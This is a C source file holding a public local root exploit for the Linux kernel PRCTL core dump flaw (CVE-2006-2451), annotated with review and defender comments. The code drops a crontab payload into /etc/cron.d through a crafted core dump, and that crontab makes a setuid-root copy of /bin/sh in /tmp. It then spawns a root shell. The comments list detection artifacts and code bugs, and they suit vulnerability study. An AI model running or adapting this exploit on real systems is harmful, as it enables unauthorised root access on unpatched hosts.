rs_prctl_kernal.c

  1. /*****************************************************/
  2. /* Local r00t Exploit for:                           */
  3. /* Linux Kernel PRCTL Core Dump Handling             */
  4. /* ( BID 18874 / CVE-2006-2451 )                     */
  5. /* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
  6. /* By:                                               */
  7. /* - dreyer    <[email protected]>   (main PoC code)   */
  8. /* - RoMaNSoFt <[email protected]> (local root code) */
  9. /*                                  [ 10.Jul.2006 ]  */
  10. /*****************************************************/
  11.  
  12. #include <stdio.h>
  13. #include <sys/time.h>
  14. #include <sys/resource.h>
  15. #include <unistd.h>
  16. #include <linux/prctl.h>
  17. #include <stdlib.h>
  18. #include <sys/types.h>
  19. #include <signal.h>
  20.  
/* Crontab fragment kept in the process image. Nothing in main() references it
 * directly; the program relies on it being present in the child's core dump,
 * which the child arranges to be written under /etc/cron.d (see the chdir()
 * in main). The line "* * * * *   root ..." copies /bin/sh to /tmp/sh as a
 * setuid-root binary and then deletes the dropped file /etc/cron.d/core.
 * Defender note: an unexpected file named "core" in /etc/cron.d and a
 * setuid-root copy of /bin/sh in /tmp are the on-disk artifacts of this. */
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
  22.  
/*
 * Entry point. Sequence as written: lift the core-dump size limit, fork a
 * child that changes into /etc/cron.d and calls prctl(PR_SET_DUMPABLE, 2),
 * crash that child with SIGSEGV from the parent, wait 62 seconds, then
 * run /tmp/sh.
 *
 * What made this a privilege-escalation bug is confined to the kernel range
 * given in the file header (>= 2.6.13, < 2.6.17.4): those kernels accepted
 * the non-boolean dumpable value and produced the core file in the child's
 * working directory regardless of the user's permission there. Patched
 * kernels reject that value, so this sequence has no effect on them.
 *
 * Observable artifacts for defenders: a process setting PR_SET_DUMPABLE to
 * a value other than 0/1, new files appearing in /etc/cron.d (the payload
 * itself names /etc/cron.d/core), and a setuid-root /bin/sh copy in /tmp.
 *
 * Review notes on the code itself: no return value is checked anywhere.
 * If fork() fails it returns -1, the `!child` test is false, and
 * kill(-1, SIGSEGV) is then delivered to every process this user may
 * signal -- a destructive side effect unrelated to the intent. setrlimit(),
 * chdir() and prctl() failures are likewise silent. main() reaches its
 * closing brace without a return statement; C99 treats that as return 0.
 */
int main() {
    int child;                       /* fork() result: 0 in the child, pid (or -1) in the parent */
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    /* Unlimited core size so a dump is written at all. Result unchecked. */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        /* Child. The working directory is where the core file will land;
         * a failed chdir() is not detected. */
        chdir("/etc/cron.d");
        /* Value 2 is the out-of-range argument the affected kernels
         * accepted (see header comment). Result unchecked. */
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);                  /* idle until the parent's SIGSEGV arrives */
        exit(1);                     /* only reached if no signal was delivered */
    }

    /* Parent. NOTE(review): when fork() failed, child == -1 and this
     * signals every process the caller is allowed to signal. */
    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
    sleep(62);                       /* fixed wait for cron's once-a-minute pass ("* * * * *" in payload); never verified */

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
    system("/tmp/sh -i");            /* assumes the cron job ran; no check that /tmp/sh exists */
}